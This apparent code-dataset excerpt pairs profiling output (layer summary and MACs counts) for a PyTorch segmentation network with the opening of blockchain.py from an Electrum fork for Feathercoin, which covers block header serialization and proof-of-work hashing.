ReLU-79 [-1, 256, 11, 15] 0
Conv2d-80 [-1, 256, 11, 15] 589,824
BatchNorm2d-81 [-1, 256, 11, 15] 512
ReLU-82 [-1, 256, 11, 15] 0
ResBlock-83 [-1, 256, 11, 15] 0
Conv2d-84 [-1, 256, 11, 15] 589,824
BatchNorm2d-85 [-1, 256, 11, 15] 512
ReLU-86 [-1, 256, 11, 15] 0
Conv2d-87 [-1, 256, 11, 15] 589,824
BatchNorm2d-88 [-1, 256, 11, 15] 512
ReLU-89 [-1, 256, 11, 15] 0
ResBlock-90 [-1, 256, 11, 15] 0
Conv2d-91 [-1, 512, 11, 15] 1,179,648
BatchNorm2d-92 [-1, 512, 11, 15] 1,024
ReLU-93 [-1, 512, 11, 15] 0
Conv2d-94 [-1, 512, 11, 15] 2,359,296
BatchNorm2d-95 [-1, 512, 11, 15] 1,024
Conv2d-96 [-1, 512, 11, 15] 131,072
BatchNorm2d-97 [-1, 512, 11, 15] 1,024
ReLU-98 [-1, 512, 11, 15] 0
ResBlock-99 [-1, 512, 11, 15] 0
AdaptiveAvgPool2d-100 [-1, 512, 1, 1] 0
Conv2d-101 [-1, 128, 1, 1] 65,536
BatchNorm2d-102 [-1, 128, 1, 1] 256
ReLU-103 [-1, 128, 1, 1] 0
AdaptiveAvgPool2d-104 [-1, 512, 2, 2] 0
Conv2d-105 [-1, 128, 2, 2] 65,536
BatchNorm2d-106 [-1, 128, 2, 2] 256
ReLU-107 [-1, 128, 2, 2] 0
AdaptiveAvgPool2d-108 [-1, 512, 4, 4] 0
Conv2d-109 [-1, 128, 4, 4] 65,536
BatchNorm2d-110 [-1, 128, 4, 4] 256
ReLU-111 [-1, 128, 4, 4] 0
AdaptiveAvgPool2d-112 [-1, 512, 8, 8] 0
Conv2d-113 [-1, 128, 8, 8] 65,536
BatchNorm2d-114 [-1, 128, 8, 8] 256
ReLU-115 [-1, 128, 8, 8] 0
Conv2d-116 [-1, 512, 11, 15] 4,718,592
BatchNorm2d-117 [-1, 512, 11, 15] 1,024
ReLU-118 [-1, 512, 11, 15] 0
PSPModule-119 [-1, 512, 11, 15] 0
Conv2d-120 [-1, 19, 44, 60] 1,216
BatchNorm2d-121 [-1, 19, 44, 60] 38
ReLU-122 [-1, 19, 44, 60] 0
Conv2d-123 [-1, 32, 22, 30] 4,096
BatchNorm2d-124 [-1, 32, 22, 30] 64
ReLU-125 [-1, 32, 22, 30] 0
Conv2d-126 [-1, 128, 11, 15] 65,536
BatchNorm2d-127 [-1, 128, 11, 15] 256
ReLU-128 [-1, 128, 11, 15] 0
Conv2d-129 [-1, 32, 11, 15] 4,096
BatchNorm2d-130 [-1, 32, 11, 15] 64
ReLU-131 [-1, 32, 11, 15] 0
ConvTranspose2d-132 [-1, 32, 22, 30] 512
Conv2d-133 [-1, 32, 22, 30] 18,432
BatchNorm2d-134 [-1, 32, 22, 30] 64
ReLU-135 [-1, 32, 22, 30] 0
FuseBlock-136 [-1, 32, 22, 30] 0
Conv2d-137 [-1, 19, 22, 30] 608
BatchNorm2d-138 [-1, 19, 22, 30] 38
ReLU-139 [-1, 19, 22, 30] 0
ConvTranspose2d-140 [-1, 19, 44, 60] 304
Conv2d-141 [-1, 19, 44, 60] 6,498
BatchNorm2d-142 [-1, 19, 44, 60] 38
ReLU-143 [-1, 19, 44, 60] 0
FuseBlock-144 [-1, 19, 44, 60] 0
Conv2d-145 [-1, 19, 44, 60] 3,249
BatchNorm2d-146 [-1, 19, 44, 60] 38
ReLU-147 [-1, 19, 44, 60] 0
ConvTranspose2d-148 [-1, 19, 352, 480] 4,864
================================================================
Total params: 13,479,154
Trainable params: 13,479,154
Non-trainable params: 0
----------------------------------------------------------------
Input size (MB): 1.93
Forward/backward pass size (MB): 201.94
Params size (MB): 51.42
Estimated Total Size (MB): 255.29
----------------------------------------------------------------
Skipped operation aten::relu_ 40 time(s)
Skipped operation aten::add_ 10 time(s)
Skipped operation aten::adaptive_avg_pool2d 4 time(s)
Skipped operation aten::upsample_bilinear2d 4 time(s)
DF1SegX11(
13.765 GMac, 100.000% MACs,
(conv1): Sequential(
0.173 GMac, 1.257% MACs,
(0): Conv2d(0.042 GMac, 0.309% MACs, 3, 3, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(1): BatchNorm2d(0.003 GMac, 0.023% MACs, 3, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(2): ReLU(0.002 GMac, 0.011% MACs, inplace=True)
(3): Conv2d(0.113 GMac, 0.823% MACs, 3, 32, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(4): BatchNorm2d(0.008 GMac, 0.061% MACs, 32, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(5): ReLU(0.004 GMac, 0.030% MACs, inplace=True)
)
(conv2): Sequential(
1.831 GMac, 13.300% MACs,
(0): Conv2d(1.208 GMac, 8.775% MACs, 32, 32, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(1): BatchNorm2d(0.008 GMac, 0.061% MACs, 32, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(2): ReLU(0.004 GMac, 0.030% MACs, inplace=True)
(3): Conv2d(0.604 GMac, 4.388% MACs, 32, 64, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(4): BatchNorm2d(0.004 GMac, 0.030% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(5): ReLU(0.002 GMac, 0.015% MACs, inplace=True)
)
(res2): Sequential(
3.171 GMac, 23.035% MACs,
(0): ResBlock(
1.957 GMac, 14.214% MACs,
(conv00): Conv2d(1.208 GMac, 8.775% MACs, 64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn00): BatchNorm2d(0.004 GMac, 0.030% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv01): Conv2d(0.302 GMac, 2.194% MACs, 64, 64, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn01): BatchNorm2d(0.001 GMac, 0.008% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv1): Conv2d(0.0 GMac, 0.000% MACs, 64, 64, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(0.0 GMac, 0.000% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.003 GMac, 0.023% MACs, inplace=True)
(conv2): Conv2d(0.302 GMac, 2.194% MACs, 64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.001 GMac, 0.008% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(downsample): Sequential(
0.135 GMac, 0.983% MACs,
(0): Conv2d(0.134 GMac, 0.975% MACs, 64, 64, kernel_size=(2, 2), stride=(2, 2), bias=False)
(1): BatchNorm2d(0.001 GMac, 0.008% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(1): ResBlock(
0.607 GMac, 4.411% MACs,
(conv00): Conv2d(0.0 GMac, 0.000% MACs, 64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn00): BatchNorm2d(0.0 GMac, 0.000% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv01): Conv2d(0.0 GMac, 0.000% MACs, 64, 64, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn01): BatchNorm2d(0.0 GMac, 0.000% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv1): Conv2d(0.302 GMac, 2.194% MACs, 64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(0.001 GMac, 0.008% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.001 GMac, 0.008% MACs, inplace=True)
(conv2): Conv2d(0.302 GMac, 2.194% MACs, 64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.001 GMac, 0.008% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
(2): ResBlock(
0.607 GMac, 4.411% MACs,
(conv00): Conv2d(0.0 GMac, 0.000% MACs, 64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn00): BatchNorm2d(0.0 GMac, 0.000% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv01): Conv2d(0.0 GMac, 0.000% MACs, 64, 64, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn01): BatchNorm2d(0.0 GMac, 0.000% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv1): Conv2d(0.302 GMac, 2.194% MACs, 64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(0.001 GMac, 0.008% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.001 GMac, 0.008% MACs, inplace=True)
(conv2): Conv2d(0.302 GMac, 2.194% MACs, 64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.001 GMac, 0.008% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(res3): Sequential(
2.037 GMac, 14.797% MACs,
(0): ResBlock(
0.826 GMac, 5.999% MACs,
(conv00): Conv2d(0.302 GMac, 2.194% MACs, 64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn00): BatchNorm2d(0.001 GMac, 0.008% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv01): Conv2d(0.151 GMac, 1.097% MACs, 64, 128, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn01): BatchNorm2d(0.001 GMac, 0.004% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv1): Conv2d(0.0 GMac, 0.000% MACs, 64, 128, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(0.0 GMac, 0.000% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.001 GMac, 0.008% MACs, inplace=True)
(conv2): Conv2d(0.302 GMac, 2.194% MACs, 128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.001 GMac, 0.004% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(downsample): Sequential(
0.068 GMac, 0.491% MACs,
(0): Conv2d(0.067 GMac, 0.488% MACs, 64, 128, kernel_size=(2, 2), stride=(2, 2), bias=False)
(1): BatchNorm2d(0.001 GMac, 0.004% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(1): ResBlock(
0.606 GMac, 4.399% MACs,
(conv00): Conv2d(0.0 GMac, 0.000% MACs, 128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn00): BatchNorm2d(0.0 GMac, 0.000% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv01): Conv2d(0.0 GMac, 0.000% MACs, 128, 128, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn01): BatchNorm2d(0.0 GMac, 0.000% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv1): Conv2d(0.302 GMac, 2.194% MACs, 128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(0.001 GMac, 0.004% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.001 GMac, 0.004% MACs, inplace=True)
(conv2): Conv2d(0.302 GMac, 2.194% MACs, 128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.001 GMac, 0.004% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
(2): ResBlock(
0.606 GMac, 4.399% MACs,
(conv00): Conv2d(0.0 GMac, 0.000% MACs, 128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn00): BatchNorm2d(0.0 GMac, 0.000% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv01): Conv2d(0.0 GMac, 0.000% MACs, 128, 128, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn01): BatchNorm2d(0.0 GMac, 0.000% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv1): Conv2d(0.302 GMac, 2.194% MACs, 128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(0.001 GMac, 0.004% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.001 GMac, 0.004% MACs, inplace=True)
(conv2): Conv2d(0.302 GMac, 2.194% MACs, 128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.001 GMac, 0.004% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(res4_1): Sequential(
2.033 GMac, 14.772% MACs,
(0): ResBlock(
0.824 GMac, 5.985% MACs,
(conv00): Conv2d(0.302 GMac, 2.194% MACs, 128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn00): BatchNorm2d(0.001 GMac, 0.004% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv01): Conv2d(0.151 GMac, 1.097% MACs, 128, 256, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn01): BatchNorm2d(0.0 GMac, 0.002% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv1): Conv2d(0.0 GMac, 0.000% MACs, 128, 256, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(0.0 GMac, 0.000% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.001 GMac, 0.004% MACs, inplace=True)
(conv2): Conv2d(0.302 GMac, 2.194% MACs, 256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.0 GMac, 0.002% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(downsample): Sequential(
0.067 GMac, 0.489% MACs,
(0): Conv2d(0.067 GMac, 0.488% MACs, 128, 256, kernel_size=(2, 2), stride=(2, 2), bias=False)
(1): BatchNorm2d(0.0 GMac, 0.002% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(1): ResBlock(
0.605 GMac, 4.393% MACs,
(conv00): Conv2d(0.0 GMac, 0.000% MACs, 256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn00): BatchNorm2d(0.0 GMac, 0.000% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv01): Conv2d(0.0 GMac, 0.000% MACs, 256, 256, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn01): BatchNorm2d(0.0 GMac, 0.000% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv1): Conv2d(0.302 GMac, 2.194% MACs, 256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(0.0 GMac, 0.002% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.0 GMac, 0.002% MACs, inplace=True)
(conv2): Conv2d(0.302 GMac, 2.194% MACs, 256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.0 GMac, 0.002% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
(2): ResBlock(
0.605 GMac, 4.393% MACs,
(conv00): Conv2d(0.0 GMac, 0.000% MACs, 256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn00): BatchNorm2d(0.0 GMac, 0.000% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv01): Conv2d(0.0 GMac, 0.000% MACs, 256, 256, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn01): BatchNorm2d(0.0 GMac, 0.000% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv1): Conv2d(0.302 GMac, 2.194% MACs, 256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(0.0 GMac, 0.002% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.0 GMac, 0.002% MACs, inplace=True)
(conv2): Conv2d(0.302 GMac, 2.194% MACs, 256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.0 GMac, 0.002% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(res4_2): Sequential(
1.881 GMac, 13.666% MACs,
(0): ResBlock(
1.881 GMac, 13.666% MACs,
(conv00): Conv2d(0.0 GMac, 0.000% MACs, 256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn00): BatchNorm2d(0.0 GMac, 0.000% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv01): Conv2d(0.0 GMac, 0.000% MACs, 256, 512, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn01): BatchNorm2d(0.0 GMac, 0.000% MACs, 512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv1): Conv2d(0.604 GMac, 4.388% MACs, 256, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(0.001 GMac, 0.004% MACs, 512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.001 GMac, 0.004% MACs, inplace=True)
(conv2): Conv2d(1.208 GMac, 8.775% MACs, 512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.001 GMac, 0.004% MACs, 512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(downsample): Sequential(
0.068 GMac, 0.491% MACs,
(0): Conv2d(0.067 GMac, 0.488% MACs, 256, 512, kernel_size=(1, 1), stride=(1, 1), bias=False)
(1): BatchNorm2d(0.001 GMac, 0.004% MACs, 512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
)
(psp): PSPModule(
2.423 GMac, 17.605% MACs,
(stages): ModuleList(
0.007 GMac, 0.048% MACs,
(0): Sequential(
0.0 GMac, 0.002% MACs,
(0): AdaptiveAvgPool2d(0.0 GMac, 0.002% MACs, output_size=(1, 1))
(1): Conv2d(0.0 GMac, 0.000% MACs, 512, 128, kernel_size=(1, 1), stride=(1, 1), bias=False)
(2): BatchNorm2d(0.0 GMac, 0.000% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(3): ReLU(0.0 GMac, 0.000% MACs, inplace=True)
)
(1): Sequential(
0.001 GMac, 0.004% MACs,
(0): AdaptiveAvgPool2d(0.0 GMac, 0.002% MACs, output_size=(2, 2))
(1): Conv2d(0.0 GMac, 0.002% MACs, 512, 128, kernel_size=(1, 1), stride=(1, 1), bias=False)
(2): BatchNorm2d(0.0 GMac, 0.000% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(3): ReLU(0.0 GMac, 0.000% MACs, inplace=True)
)
(2): Sequential(
0.001 GMac, 0.010% MACs,
(0): AdaptiveAvgPool2d(0.0 GMac, 0.002% MACs, output_size=(4, 4))
(1): Conv2d(0.001 GMac, 0.008% MACs, 512, 128, kernel_size=(1, 1), stride=(1, 1), bias=False)
(2): BatchNorm2d(0.0 GMac, 0.000% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(3): ReLU(0.0 GMac, 0.000% MACs, inplace=True)
)
(3): Sequential(
0.004 GMac, 0.033% MACs,
(0): AdaptiveAvgPool2d(0.0 GMac, 0.002% MACs, output_size=(8, 8))
(1): Conv2d(0.004 GMac, 0.030% MACs, 512, 128, kernel_size=(1, 1), stride=(1, 1), bias=False)
(2): BatchNorm2d(0.0 GMac, 0.000% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(3): ReLU(0.0 GMac, 0.000% MACs, inplace=True)
)
)
(bottleneck): Conv2d(2.416 GMac, 17.551% MACs, 1024, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn): BatchNorm2d(0.001 GMac, 0.004% MACs, 512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.0 GMac, 0.002% MACs, inplace=True)
)
(wc3): Sequential(
0.01 GMac, 0.076% MACs,
(0): Conv2d(0.01 GMac, 0.072% MACs, 64, 19, kernel_size=(1, 1), stride=(1, 1), bias=False)
(1): BatchNorm2d(0.0 GMac, 0.002% MACs, 19, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(2): ReLU(0.0 GMac, 0.001% MACs, inplace=True)
)
(wc4): Sequential(
0.009 GMac, 0.062% MACs,
(0): Conv2d(0.008 GMac, 0.061% MACs, 128, 32, kernel_size=(1, 1), stride=(1, 1), bias=False)
(1): BatchNorm2d(0.0 GMac, 0.001% MACs, 32, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(2): ReLU(0.0 GMac, 0.000% MACs, inplace=True)
)
(wc5): Sequential(
0.034 GMac, 0.245% MACs,
(0): Conv2d(0.034 GMac, 0.244% MACs, 512, 128, kernel_size=(1, 1), stride=(1, 1), bias=False)
(1): BatchNorm2d(0.0 GMac, 0.001% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(2): ReLU(0.0 GMac, 0.000% MACs, inplace=True)
)
(dec4): FuseBlock(
0.04 GMac, 0.293% MACs,
(conv1): Conv2d(0.002 GMac, 0.015% MACs, 128, 32, kernel_size=(1, 1), stride=(1, 1), bias=False)
(bn1): BatchNorm2d(0.0 GMac, 0.000% MACs, 32, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.0 GMac, 0.001% MACs, inplace=True)
(dconv): ConvTranspose2d(0.0 GMac, 0.002% MACs, 32, 32, kernel_size=(4, 4), stride=(2, 2), padding=(1, 1), groups=32, bias=False)
(conv2): Conv2d(0.038 GMac, 0.274% MACs, 64, 32, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.0 GMac, 0.001% MACs, 32, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
(dec3): FuseBlock(
0.056 GMac, 0.405% MACs,
(conv1): Conv2d(0.001 GMac, 0.009% MACs, 32, 19, kernel_size=(1, 1), stride=(1, 1), bias=False)
(bn1): BatchNorm2d(0.0 GMac, 0.001% MACs, 19, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.0 GMac, 0.001% MACs, inplace=True)
(dconv): ConvTranspose2d(0.001 GMac, 0.005% MACs, 19, 19, kernel_size=(4, 4), stride=(2, 2), padding=(1, 1), groups=19, bias=False)
(conv2): Conv2d(0.053 GMac, 0.387% MACs, 38, 19, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.0 GMac, 0.002% MACs, 19, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
(score): Sequential(
0.027 GMac, 0.197% MACs,
(0): Conv2d(0.027 GMac, 0.193% MACs, 19, 19, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(1): BatchNorm2d(0.0 GMac, 0.002% MACs, 19, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(2): ReLU(0.0 GMac, 0.001% MACs, inplace=True)
)
(score_u8): ConvTranspose2d(0.04 GMac, 0.289% MACs, 19, 19, kernel_size=(16, 16), stride=(8, 8), padding=(4, 4), groups=19, bias=False)
)
[INFO] Register count_convNd() for <class 'torch.nn.modules.conv.Conv2d'>.
[INFO] Register count_bn() for <class 'torch.nn.modules.batchnorm.BatchNorm2d'>.
[INFO] Register zero_ops() for <class 'torch.nn.modules.activation.ReLU'>.
[WARN] Cannot find rule for <class 'torch.nn.modules.container.Sequential'>. Treat it as zero Macs and zero Params.
[WARN] Cannot find rule for <class '__main__.ResBlock'>. Treat it as zero Macs and zero Params.
[INFO] Register count_adap_avgpool() for <class 'torch.nn.modules.pooling.AdaptiveAvgPool2d'>.
[WARN] Cannot find rule for <class 'torch.nn.modules.container.ModuleList'>. Treat it as zero Macs and zero Params.
[WARN] Cannot find rule for <class '__main__.PSPModule'>. Treat it as zero Macs and zero Params.
[INFO] Register count_convNd() for <class 'torch.nn.modules.conv.ConvTranspose2d'>.
[WARN] Cannot find rule for <class '__main__.FuseBlock'>. Treat it as zero Macs and zero Params.
[WARN] Cannot find rule for <class '__main__.DF1SegX11'>. Treat it as zero Macs and zero Params.
defaultdict(<class 'float'>, {'conv': 32.417824768, 'batchnorm': 0.18514432})
13765265280.0 18756722
32512581120.0 13479154.0
Process finished with exit code 0
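(Note: the [WARN] lines above are expected; thop registers counting rules only
for module types it knows (see the [INFO] lines), so containers and custom
blocks report zero MACs/params themselves while their child layers are still
counted in the totals.)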
'''
| 56.829847 | 319 | 0.543206 |
6fadf40ca22ddda121c1109e8ec358c31fb3506f
| 18,443 |
py
|
Python
|
lib/blockchain.py
|
quietnan/electrum-ftc
|
5f72cadd777d80a7235e4860589c425287a67fe9
|
[
"MIT"
] | null | null | null |
lib/blockchain.py
|
quietnan/electrum-ftc
|
5f72cadd777d80a7235e4860589c425287a67fe9
|
[
"MIT"
] | null | null | null |
lib/blockchain.py
|
quietnan/electrum-ftc
|
5f72cadd777d80a7235e4860589c425287a67fe9
|
[
"MIT"
] | null | null | null |
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 [email protected]
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import threading
from . import util
from . import bitcoin
from . import constants
from .bitcoin import *
MAX_TARGET = 0x00000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
MAX_TARGET_NEOSCRYPT = 0x0000003FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
SEVEN_DAYS = 7 * 24 * 60 * 60
HEIGHT_FORK_ONE = 33000
HEIGHT_FORK_TWO = 87948
HEIGHT_FORK_THREE = 204639
HEIGHT_FORK_FOUR = 432000
def serialize_header(res):
s = int_to_hex(res.get('version'), 4) \
+ rev_hex(res.get('prev_block_hash')) \
+ rev_hex(res.get('merkle_root')) \
+ int_to_hex(int(res.get('timestamp')), 4) \
+ int_to_hex(int(res.get('bits')), 4) \
+ int_to_hex(int(res.get('nonce')), 4)
return s
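# A serialized header is always 80 bytes:
#   version (4 bytes, LE) | prev_block_hash (32, byte-reversed) |
#   merkle_root (32, byte-reversed) | timestamp (4) | bits (4) | nonce (4)
# Illustrative round trip (a sketch; assumes `h` is a dict with exactly the
# keys produced by deserialize_header below):
#   deserialize_header(bfh(serialize_header(h)), h['block_height']) == h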
def deserialize_header(s, height):
if not s:
raise Exception('Invalid header: {}'.format(s))
if len(s) != 80:
raise Exception('Invalid header length: {}'.format(len(s)))
hex_to_int = lambda s: int('0x' + bh2u(s[::-1]), 16)
h = {}
h['version'] = hex_to_int(s[0:4])
h['prev_block_hash'] = hash_encode(s[4:36])
h['merkle_root'] = hash_encode(s[36:68])
h['timestamp'] = hex_to_int(s[68:72])
h['bits'] = hex_to_int(s[72:76])
h['nonce'] = hex_to_int(s[76:80])
h['block_height'] = height
return h
def pow_hash_header(header):
if header is None:
return '0' * 64
if header.get('prev_block_hash') is None:
header['prev_block_hash'] = '00'*32
hashAlg = PoWNeoScryptHash
if header.get('timestamp') < 1414346265:
hashAlg = PoWHash
return hash_encode(hashAlg(bfh(serialize_header(header))))
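# The timestamp cutoff above (1414346265, late October 2014) appears to match
# Feathercoin's hard fork from scrypt to NeoScrypt: headers mined before the
# fork are still hashed with the old PoW function when checking work.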
def hash_header(header):
if header is None:
return '0' * 64
if header.get('prev_block_hash') is None:
header['prev_block_hash'] = '00'*32
return hash_encode(Hash(bfh(serialize_header(header))))
